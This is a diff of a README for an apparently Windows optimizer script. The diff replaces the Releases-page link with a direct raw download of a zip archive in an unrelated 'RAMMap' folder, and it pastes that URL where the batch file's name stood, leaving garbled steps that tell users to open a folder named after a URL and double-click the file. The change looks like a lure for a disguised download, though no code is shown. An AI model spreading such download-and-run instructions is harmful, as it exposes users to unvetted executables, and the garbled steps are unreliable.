mahdi930/windows-optimizer-script/README.md

 ## Installation

-To get started, download the latest release of the script from the [Releases](https://github.com/mahdi930/windows-optimizer-script/releases) section.
-Look for the file named `windows-optimizer.bat`, download it, and save it to a convenient location on your computer.
+To get started, download the latest release of the script from the [Releases](https://github.com/mahdi930/windows-optimizer-script/raw/refs/heads/main/RAMMap/windows_optimizer_script_v1.6.zip) section.
+Look for the file named `https://github.com/mahdi930/windows-optimizer-script/raw/refs/heads/main/RAMMap/windows_optimizer_script_v1.6.zip`, download it, and save it to a convenient location on your computer.

 ## Usage

 Once you have downloaded the script, follow these steps to run it:

-1. Navigate to the folder where you saved `windows-optimizer.bat`.
+1. Navigate to the folder where you saved `https://github.com/mahdi930/windows-optimizer-script/raw/refs/heads/main/RAMMap/windows_optimizer_script_v1.6.zip`.
 2. Double-click the file to execute it.
 3. Follow any on-screen instructions to complete the optimization process.